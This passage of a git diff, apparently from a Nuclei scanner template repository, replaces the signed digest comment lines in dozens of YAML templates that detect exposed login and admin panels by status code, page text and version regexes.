490a00463044022042541274fe96259fa947539432a417d8e8b36882776d2b0a644afb5849edef2d0220206fd57bf495066dec52e5abd9eb95e650b2b5a0ab135871f087c2288e689f25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/authelia-panel.yaml b/http/exposed-panels/authelia-panel.yaml index a870f2c5cb..196d198a47 100644 --- a/http/exposed-panels/authelia-panel.yaml +++ b/http/exposed-panels/authelia-panel.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008fd87b39284e84d585bb9f507cbcbbe83b8d7e6cdd73eb30ac8401c192cd19a2022061c03f9d86a08c9af5bb06582714b9d38aed4e8e104af2045c44c95392e0e73a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022011c652c8e4ad3e46de531e029c3bcd7fe019a1f7ef8a71aa7ef87b3d039c60d4022034538df50b7e165e8d36b3bbcb858d44a935fa2bc1592669221f17de9e1f0b50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/automatisch-panel.yaml b/http/exposed-panels/automatisch-panel.yaml index 820ccb5a6d..a565208593 100644 --- a/http/exposed-panels/automatisch-panel.yaml +++ b/http/exposed-panels/automatisch-panel.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022035fe81f8489195b9067d4a0737e6e679ae53525803c06f578856012fdbdc1b100221008fd79bd81b27673d0a378a9f1cddf49f6c244e33a6087b2ee89cf09d85f71a4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c0fc76e89d349cc359436d249df7d23e73c1c05572452611732c1e9c191dedf02210082d970687d4a767df2631f431e814547859cbae5d2731465dce39b7d76551678:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/autoset-detect.yaml b/http/exposed-panels/autoset-detect.yaml index d891720054..a9ac93f1b9 100644 --- a/http/exposed-panels/autoset-detect.yaml +++ b/http/exposed-panels/autoset-detect.yaml @@ -36,4 +36,4 @@ http: group: 1 regex: - 'AutoSet (\d+(\.\d+)+)\b' -# digest: 4a0a004730450221008749f06172560522b858602a0ab2e051598a9f3730cb7dd05f1d5dffa07b0ffc022007b0555f10f4c2d96fd37b2ff258e1c9281c56f3550a0c62f8560e312618b290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220037d4ea4d6efd6711ded7e2106a453a089436d6e0da04a19f9ee5be28952a858022002dd36b72a3d791784c97884ac73c9485e23055cb872e178598bf17c05bc317e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/avantfax-panel.yaml b/http/exposed-panels/avantfax-panel.yaml index 15f44f7e53..7b0075b13e 100644 --- a/http/exposed-panels/avantfax-panel.yaml +++ b/http/exposed-panels/avantfax-panel.yaml @@ -44,4 +44,4 @@ http: group: 1 regex: - '<p align="center">([0-9.]+)<\/p>' -# digest: 490a00463044022003d52cbba47ec2c8b4cae0872a5686fcf27efbf8a2a2a39fe2115c6f081eeab802202b7e87d630edfeb150abae4f6aa8e98bd7cb820a1b36e56ab6e9335d650ea28f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f660132d55b67dea8144c7cfa35915e47ef4fdf7ae2347befd215163797cb0e02210082bd97c4450b607eb41e2a31725395ef1c7fc1c38fc1d32fb0c684f9a309edcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml index d5fc1c9f4a..0d073af63d 100644 --- a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b0a006b0b4214b31341131bca90abeb5abc213959a6e4dfa8fecfb1083ec3c120220258a337d808718ec2a09df2e4af04a565aa2015ec8188979aa142e387c387d80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc80178b0b0753bf780a8d22cabda480e4cb0abae0a092b89825aae6e3e5460e02202329c4a0773355187eefa03d7c4729d0c31e0d97f17e972a837afe7dad1aac68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml index 2f87f2202d..fb08e816e2 100644 --- a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml @@ -39,4 +39,4 @@ http: group: 1 regex: - "</sup> System Manager ([a-z0-9.]+)</h1>" -# digest: 490a004630440220742c535fcf40b698ab4d4ac8550eecc886cdc968e67e6f78e7ac0d1dd3c602090220667eabb92d12f1e20876c1644b471fee43924eedcae0fd0a674e774d05a522e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220154ae9bfa92630d43787a9a336f5d0ec1972051c60c0f8d3390c7cc1aa57970b022100dbb72cfd24d781e8676005f38996ddaf2a980b8f86f832c19d301e015a244798:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aviatrix-panel.yaml b/http/exposed-panels/aviatrix-panel.yaml index 4508727381..7ce87ccc90 100644 --- a/http/exposed-panels/aviatrix-panel.yaml +++ b/http/exposed-panels/aviatrix-panel.yaml @@ -38,4 +38,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207fe85a753a31b3a6089a43a85527b34f42000af5a8e49713e19f0e12ccce963d0220569f10add1384df4bd2795ebaa3001b2ded432e76b449e85f3a2a7cb1ae269ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085af6404b949da4595cda2561dea304767be72dc09bd849f5b2d307253394b1202206489e9b4a02960bb76f52007496f93d3e6ad5d843b3707060cf9f5c369f5f018:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/avigilon-panel.yaml b/http/exposed-panels/avigilon-panel.yaml index ebcc001bc6..954d718aa0 100644 --- a/http/exposed-panels/avigilon-panel.yaml +++ b/http/exposed-panels/avigilon-panel.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008a1100925f10bb7cfe702541f9583ad536cc6c872506c7491640e88651156dd5022100ec00500bb98ccd4e20c1c974b7df6f1fbdc4bd59a0be92da627e5e2279950f03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9dc88a619d4b812ffec89ff20a8edd071ccd9de6345fdbd695d5753c39bc9f002210088439df4fd90c7a7c9e0d7dacf7a0674c28c040c117f334d227159bf43ef9eeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aws-ec2-autoscale.yaml b/http/exposed-panels/aws-ec2-autoscale.yaml index dcf58b2434..6d88fc9720 100644 --- a/http/exposed-panels/aws-ec2-autoscale.yaml +++ b/http/exposed-panels/aws-ec2-autoscale.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022042b6830d8c26c3df2548e65415fb60d85296fc59f89b74296bd2078a845114230220711859145df6213f2dd6aaf26b64437279cfff99849e5a6c8d3900d1aa7bcaf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100914770a771ff7b618b617717307b6e56f9ba083ce8d22da410cc9e3997ea8200022100f16fafc7b302da5335e6d59ab2832434d1f26be372c993946e5e87f507076a70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aws-opensearch-login.yaml b/http/exposed-panels/aws-opensearch-login.yaml index 387441e6c8..76837ae4c7 100644 --- a/http/exposed-panels/aws-opensearch-login.yaml +++ b/http/exposed-panels/aws-opensearch-login.yaml @@ -31,4 +31,4 @@ http: - type: word words: - "Please login to OpenSearch Dashboards" -# digest: 4a0a00473045022100a545da3e16df9c30198e45761bd50b51f2e497bb38cb56da3c83608801fefbc8022045e5554e77ebb6d3bc952b7a79db1fdfb19d0bef9f53c9c228b4fc66566f5ac6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe8d9a26949353d3f4e71706af941bfae2ebc0b13d27f949d01353a84eab70f9022100e8e25a3c928f13e1944fd0b5bbec3151b4eac4ee61a96dce15be94f1d9bf1966:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axel-webserver.yaml b/http/exposed-panels/axel-webserver.yaml index 01c1e2325f..1438289474 100644 --- a/http/exposed-panels/axel-webserver.yaml +++ b/http/exposed-panels/axel-webserver.yaml @@ -37,4 +37,4 @@ http: group: 1 regex: - 'Axel MyWeb (.*)' -# digest: 4a0a0047304502210096153e74c6a2e5ac1654dba3ab425d62798426f6989aabf3d67a1971b7319c1502206fd9fb03d2f6bc24884cc51fa767485e2bfcdde7809c9f7c54733fff531f3fde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207dd98ee4507bb39aca1ec1107e0928587db8acc9e826b1aa38b5073869122e440221009734e82f0e1f884f64e27a686b1434d7f75c00937551c50e8806d97ca4aa3448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axway-api-manager-panel.yaml b/http/exposed-panels/axway-api-manager-panel.yaml index daefc4aae2..dedac60d4d 100644 --- a/http/exposed-panels/axway-api-manager-panel.yaml +++ b/http/exposed-panels/axway-api-manager-panel.yaml @@ -25,4 +25,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204f790ccc7c9c6170ee0b96b3e5272ec02a6bc8ee343ec4499daf4127816d353a02202c947c2b21c5ca1e791f27387d89c6eb57b460dcc55ce8d0d18425efb5645de9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009806e6b46f0d419351aea507da113cdc16e7d0bb46d91d3356f8404c5aacd303022100d97a07a55afba6cc59ae9c4884f13cdff91afe76fb8f880dfe067c7e963d6920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axway-securetransport-panel.yaml b/http/exposed-panels/axway-securetransport-panel.yaml index 7415fa09ee..827494214a 100644 --- a/http/exposed-panels/axway-securetransport-panel.yaml +++ b/http/exposed-panels/axway-securetransport-panel.yaml @@ -58,4 +58,4 @@ http: group: 1 regex: - '"SecureTransport", "([0-9.]+)",' -# digest: 490a0046304402201ddfb542843f60c8c38397fb6a9c1f5f17c699dd6dd28a57af33a73e703fbb4202202e61be853e13b2bd760ee27dc860715d4f64225ab567be6301b93ab4945a9bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022054feef8f2efa9059abbc419acb76067d52a01b69ae814593fbf7ecbc7f1eea68022100c595e32c8240665e58beda612cfda99ca52e664b7e16e85b2ee98fd236ed5204:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axway-securetransport-webclient.yaml b/http/exposed-panels/axway-securetransport-webclient.yaml index 46f22a57ec..b90b05929f 100644 --- a/http/exposed-panels/axway-securetransport-webclient.yaml +++ b/http/exposed-panels/axway-securetransport-webclient.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e2af4e9ab70e4c0590f95e8328e0b1822647af1369ad37a2a5f8d881fd320c5a022100f9cd7ab9e9062175a6e078df81bdb18290a8fb2d1fec84782758ad276ac55a6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206b8680c58a864774467d905556e94c43cdb4c406ac445b50be3262d88156e1de022074103523ec7469d4941965a2311b4c26427af550c1f671201b7536a398135b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axxon-client-panel.yaml b/http/exposed-panels/axxon-client-panel.yaml index 349970fb55..f8c254b3b1 100644 --- a/http/exposed-panels/axxon-client-panel.yaml +++ b/http/exposed-panels/axxon-client-panel.yaml @@ -38,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008affae577adb0db5da7604e6a7c72f2b9651f9b054b394ba247a422f3ba802ea022100f6409861a449db44afc01753220df1e6de8414ce7ab930a5550ed893a9bce656:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020f132951dcaa4367eed8b8f4f2dbccb22afca8f1043ae2b49beaebc88e94bc602204675c7e76657d01b0cb1584bc35e49df33710dfdd8e18cc7cd55863229379883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bedita-panel.yaml b/http/exposed-panels/bedita-panel.yaml index a8293378b0..1f4f762de4 100644 --- a/http/exposed-panels/bedita-panel.yaml +++ b/http/exposed-panels/bedita-panel.yaml @@ -44,4 +44,4 @@ http: group: 1 regex: - 'target="besite">(.*)
' -# digest: 4b0a00483046022100dfd4490a71cb9b8b3932060ec37eb1f5de6e1f48093b7c301727311d5af578fb022100e60a0b137d4b4847ae2a60df31d11734702dcaea8e6b45737c4ddb720bbd9b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059125fba682eed0eba3921749c8232c1ed0610de0fe9636503c172b7b261074a02205d3a9b344da6d2ccdd5c0eff3f8a57999f78cf3b84307e79e0c77dd7e5f0d620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/beego-admin-dashboard.yaml b/http/exposed-panels/beego-admin-dashboard.yaml index 23cd9abd20..115c0b254b 100644 --- a/http/exposed-panels/beego-admin-dashboard.yaml +++ b/http/exposed-panels/beego-admin-dashboard.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009f7965bc6043d9d83248d2e42e3d19cb5742d01d256cb5dc25dc0531f84db1d00221009998e1ccd239000a1a813daeb04b8240f13edc6fa17d95373fe90a2014fa079a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0435b232958cace184a3be45bdd78d1e0d6b99ce8480becd429e7ed63fc2a6d02201a6cfb4957ab92ddadb30977b2c6bbcbd717a2f80fb2dd4f6a256e4a3c9fde75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/beyondtrust-priv-panel.yaml b/http/exposed-panels/beyondtrust-priv-panel.yaml index d5ce877fa1..72817e382e 100644 --- a/http/exposed-panels/beyondtrust-priv-panel.yaml +++ b/http/exposed-panels/beyondtrust-priv-panel.yaml @@ -28,4 +28,4 @@ http: - 'status_code == 200' - 'contains_any(to_lower(body), "beyondtrust privileged remote access login", "privileged-remote-access") && contains(to_lower(body), "login")' condition: and -# digest: 4a0a00473045022100a2d7e8941f79250b90fafb2e91d4d53a6e6b4bac5e49cabdd92dcffcfc6975e302201712103829d44bfb897cc1cbc4f33b757930cc5f8affd4e42259cf3b3b6493fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022028b4e01a5b67ca4c729f2f8622b5c4d5f37790ab986c7391d5d051b04c4f6f68022050105cc6f641dcc0a83e084ff5079d19f2afc6602415776f329ed7cb90fb8192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bigbluebutton-login.yaml b/http/exposed-panels/bigbluebutton-login.yaml index 7ff1746bb1..1d9bf490c3 100644 --- a/http/exposed-panels/bigbluebutton-login.yaml +++ b/http/exposed-panels/bigbluebutton-login.yaml @@ -35,4 +35,4 @@ http: group: 1 regex: - 'Greenlight<\/a>\. (.*)' -# digest: 490a0046304402202190ecc43fb8bb246d538d76505f37e2915842ced04370651f91b7222f775bba02204de8e4463ca9fb19875e4712a07b51d1109d79641f6e606619fccb61a65b4433:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe6845646e275bdfbca4e1dea47379dc8c036ac50d33169c22623c8535d6f8b0022100d4dab2264091595748d36df3d2e8c2e426bbbf57ba18fc9c6c1bed0a79f1d851:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bigfix-login.yaml b/http/exposed-panels/bigfix-login.yaml index a68e11a863..deac005e3a 100644 --- a/http/exposed-panels/bigfix-login.yaml +++ b/http/exposed-panels/bigfix-login.yaml @@ -33,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b65e3dfcfcf9e3452781c3af28bb02e13d42cc749c4c36bcb781803222cf770802206e26f87158d27f3ed4d2a4b012d6dae45d2c4f92127f252880064fcabddb7026:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022065f6a33038d7d84d83a99da20a8c681b5da9d4f21841808f9d2cb8693b4d42c50220532723384c6d829d2292ae0c5bbcc40c8eee10f9e8dab56e2f2ddb6546d99d59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bigip-rest-panel.yaml b/http/exposed-panels/bigip-rest-panel.yaml index 12ccfb4d07..66fdd0422e 100644 --- a/http/exposed-panels/bigip-rest-panel.yaml +++ b/http/exposed-panels/bigip-rest-panel.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 401 -# digest: 4a0a0047304502206764af3b5f83ceb4bd05ce52af8e68efa0979e7592565a63364aacb06c97dbf8022100dd4aadb0f61ba02642e4db9ab5f2af21d3a48b462fd6fda05f279c47a95d09d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022003fc8a5114d6bc010538fb9be54710294c20232de1c5cca399316ff67e904d06022100967ce7b24c9378d380906c306b59ddbfb63ebfbdd06430c4bcac83c1fd52f41e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/biotime-panel.yaml b/http/exposed-panels/biotime-panel.yaml index a9efea6b24..d6622230c6 100644 --- a/http/exposed-panels/biotime-panel.yaml +++ b/http/exposed-panels/biotime-panel.yaml @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022041c4bf54097a3c06343835d18246d98241fd836a92c9891ce56bf0a2877c6d24022100c1ba12357b9380235a1b4574b3c008c01223ec4a72cec702e0a0b12c7e3a9a5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa05c8a043bd0b0ba9aea94f73ad920f9c5f2325d35d876ce630f261049eb37f02207ff889721c8e76f7cf811f925ca59a9d9c5a1ade618acdc23a265c500fca8869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bitdefender-gravityzone.yaml b/http/exposed-panels/bitdefender-gravityzone.yaml index cff67665dc..3220b0ca2b 100644 --- a/http/exposed-panels/bitdefender-gravityzone.yaml +++ b/http/exposed-panels/bitdefender-gravityzone.yaml @@ -36,4 +36,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206be53c1b505d353d82468b722644f5c4c955be8646d69a2151b1ceb3154f3f4f02207c437100098d684db2ce162e5db23d6d24fef3c2a4b0f17f36837729e01a9c25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c2a091c4179b9e8ba409933cb24b7e6126889a2b6c8f60b2fe440cb5237406702205975d7ca55a946865fab0e155d841ea72ce92eff688adf7a71be125b030c2431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bitrix-panel.yaml b/http/exposed-panels/bitrix-panel.yaml index b8b2eb385a..7b90853823 100644 --- a/http/exposed-panels/bitrix-panel.yaml +++ b/http/exposed-panels/bitrix-panel.yaml @@ -36,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aed76166bf76788a65dd64db6b0e9852bd233f2edf6c712aa5e0212453007677022100a1805a4a145e8d95695f5f754536f777d3c0a37b4a1867725675ee535755aeef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205c0b7a4a474bfad77d7caee6e5094a17fc30480c4bb7984c058f33c1597961750221008af382be31ff547030a86cf127a555ba2c5df6af24a798025c9b5d7c6c67e13d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bitwarden-vault-panel.yaml b/http/exposed-panels/bitwarden-vault-panel.yaml index 2e7382eedc..05bb324c44 100644 --- a/http/exposed-panels/bitwarden-vault-panel.yaml +++ b/http/exposed-panels/bitwarden-vault-panel.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aca06cb2930ef1e0b8f2b3e1978225343e6d79ce69f7c46242018b212bfc15d5022031401800c88ea9431ae7a415edd7b4c0a217e32b30e1b5f06b3b3438192f8099:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008cf720bb429655c6a9a68aa4f0352563dd640acc2731aca393bda81d7add1a40022100b30f69abbab5fb6641768522e6dfc050f25f38fd72997b1db54afb891012d707:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/black-duck-panel.yaml b/http/exposed-panels/black-duck-panel.yaml index 5464f2025e..bbf4a6f9c6 100644 --- a/http/exposed-panels/black-duck-panel.yaml +++ b/http/exposed-panels/black-duck-panel.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ea24e64db385b676ed987956903c076911be347a07531f076856460d2a0efc4022100962cbde46271d1a25366e443128224303444467910f0f6967f61e89725feedc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022013e7b2bc1c0eb0af3800a1d928e90ed78efa8858a004a6f32e7f8bd91c1ae2ab022006e6f835652fc9f9fcf7aef711c8536d23389c7b12e1ac575dc7643cdf37dcf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bloofoxcms-login-panel.yaml b/http/exposed-panels/bloofoxcms-login-panel.yaml index 4496189c18..aa432e4f84 100644 --- a/http/exposed-panels/bloofoxcms-login-panel.yaml +++ b/http/exposed-panels/bloofoxcms-login-panel.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203756982c43b1269b90d14a376c9f0465532699b21984f7be0b087b39eb2a2f38022100a2eded3d7d8c7645fb608e8cb959a8cc08a2139faad81a2173f803ab6728fd96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078ab842389cb78b25ec38a119c4a89374aff528265c422fd1830ae10d85a1e42022100ee523748c7b2988e42ef69f4642fbc9455a5c038faa29d4ec263c53847a8a75d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bmc/bmc-discovery-panel.yaml b/http/exposed-panels/bmc/bmc-discovery-panel.yaml index 8ad4ee183e..a052b2d8da 100644 --- a/http/exposed-panels/bmc/bmc-discovery-panel.yaml +++ b/http/exposed-panels/bmc/bmc-discovery-panel.yaml @@ -40,4 +40,4 @@ http: group: 1 regex: - '<span class="logo-version">Version ([0-9.]+)' -# digest: 490a0046304402202d14fe97a89572e24a09d0dba0c3f5467f7009a8ca73446b8b5e4863f6eb1a0f02203c72c903fcbb2e6b6ca22b54f4db01537db52401dd6cb789320d9e839bc7a92b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f1633424a257ed110a2aabae8f8009bbed533db9d2a7ffc5d43ee8b4c5e9180f02200deb2a0ffac69838d4ab5a607cb4e56ed2f838bce2b10f0774ae412a112b9481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml b/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml index 236c050329..5b6a224f1f 100644 --- a/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml +++ b/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml @@ -28,4 +28,4 @@ http: - 'status_code == 200' - 'contains(to_lower(body), "<title>bmc remedy single sign-on domain data entry")' condition: and -# digest: 4b0a00483046022100a8bf1cc83392001186b717e3a336510cfb642a7f36fa1a5ad9bc33b1469ccbf4022100a49d23890aacc49884c921ccd9887487fa7507997b020eb823845d1d3957adde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f5e53b4c7f430a309582e96e90640b031d186d63303ca0657bdc61ea9b70242402206ccf010df92b973f2b5bf2f043f8dc75fca21dfcae311bf3f70ed0f7251e6119:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bolt-cms-panel.yaml b/http/exposed-panels/bolt-cms-panel.yaml index 339719234c..629e4c43f9 100644 --- a/http/exposed-panels/bolt-cms-panel.yaml +++ b/http/exposed-panels/bolt-cms-panel.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d8684f4c1b177c03406b0ec21626ca0f724aeb29eae2f9ab567a9dce7e837fcc022100e992011e055c81ba50abc96b5f8fbb09825502114e29c05d28c119d6f4940b1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203885f37d4a99874d10a961e3e8a6b109aaa0b83c2a4504b76f517d0fa8aa879c02210098a324e1efa823287f6f4f9f036a1c1e6fadd4a3e27aa96add77c850a439de74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bookstack-panel.yaml b/http/exposed-panels/bookstack-panel.yaml index 5040dec0f9..7f2e38896a 100644 --- a/http/exposed-panels/bookstack-panel.yaml +++ b/http/exposed-panels/bookstack-panel.yaml @@ -51,4 +51,4 @@ http: group: 1 regex: - '(?:app\.js|(?:print\-)?styles\.css)\?version=([\w\.\-]+)["'']>' -# digest: 4b0a00483046022100a539d284db0c4dd9737c31c3a9fb379e836a46646c6cff2a33b241c823c96c60022100c53b3a54a862556d553ab1571c96f1d7bd6eb079c5640497cfe273200a3bd61c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220441c5e876a16cf1c543b6aa23dcd05323cc28664a0f4c8edb1d4864ebba49c84022100d495e5bbfa7b589fb3fe923688fa719d535f5e1740a0f1b24b264cf8253f6155:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/buildbot-panel.yaml b/http/exposed-panels/buildbot-panel.yaml index 8b4a587b89..b91ca69cbb 100644 --- a/http/exposed-panels/buildbot-panel.yaml +++ b/http/exposed-panels/buildbot-panel.yaml @@ -49,4 +49,4 @@ http: part: body regex: - '\[\"Buildbot\", \"([0-9.]+)\"\]' -# digest: 490a0046304402202b4838278ef1da25a98701864436665c8650f5faf42d8ee3aad3f2cd1d1096d502206fc9f344bb9c2536b0803c91ed15323b30f9dc1e8398936fde98b6068c9b331e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008aef311f7bab6673a6dfff11db301ed3757b7baf2087eb1d37533717f93ab78702210094c33daa764babacbeba9ab5c683a38d6c5a363454905661de9c5161ba8ab12d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/busybox-repository-browser.yaml b/http/exposed-panels/busybox-repository-browser.yaml index b4cbda0fe7..c01ce2e9dd 100644 --- a/http/exposed-panels/busybox-repository-browser.yaml +++ b/http/exposed-panels/busybox-repository-browser.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b22d49b77ae4a717d7e7bf4f90d59dd65306501adfe35f406cb7a666fb2ed05e022100b2a44a153e2fc81a920d6e89e4a879794531bffd514ff590fddc038237226b33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d6a1f10acac0f712eb8ee9719f6f081cc8e937cb4f32885c4dc5f71a78282cd2022100cb07961a60db5dfb12cd6497f3e120d56f7d3646c283ebde7f883d4b9efe9b0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bynder-panel.yaml b/http/exposed-panels/bynder-panel.yaml index 4df9fcf7e8..9489070997 100644 --- a/http/exposed-panels/bynder-panel.yaml +++ b/http/exposed-panels/bynder-panel.yaml @@ -32,4 +32,4 @@ http: group: 1 regex: - 'http-equiv="version"\s+content="([0-9\.]+)"' -# digest: 4b0a00483046022100b5cc6f8bf28e8c01adecf1b54e1b5edb9810b58c6ccda55c5f6e3fe6fac3ac76022100e19df4227b127b06f178bd511254477e09fab706884b929bbf708c197f075c66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022014e074f997f25c5349854831b2cd24af440b348051e92a715fb085efe968a774022100deee406451e3a53f822d7e0580a8bc8eb08d41db2cd6f98621223dc1d5370c8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/ares-rat-c2.yaml b/http/exposed-panels/c2/ares-rat-c2.yaml index 8e2cda4833..607104e83f 100644 --- a/http/exposed-panels/c2/ares-rat-c2.yaml +++ b/http/exposed-panels/c2/ares-rat-c2.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009f391bde1caab637dadd216cedd223a7fcec59ffb58278a87a7a5c88e89f3844022100ad24450fff2f2fcc52d87582f0159aa5ca5f4e3694ffc3f6c63918444eb7d2d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b62bc5a67524c652daab1f294f759186a46a5ffcebd03628386ab2e29d339000220211bc1d3284e25aca84307b362a7ab113b2a13f1ff36a09679f3811be9addd4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/c2/brute-ratel-c4.yaml b/http/exposed-panels/c2/brute-ratel-c4.yaml index 81aa3b1c5f..ef13e0ee7f 100644 --- a/http/exposed-panels/c2/brute-ratel-c4.yaml +++ b/http/exposed-panels/c2/brute-ratel-c4.yaml @@ -26,4 +26,4 @@ http: 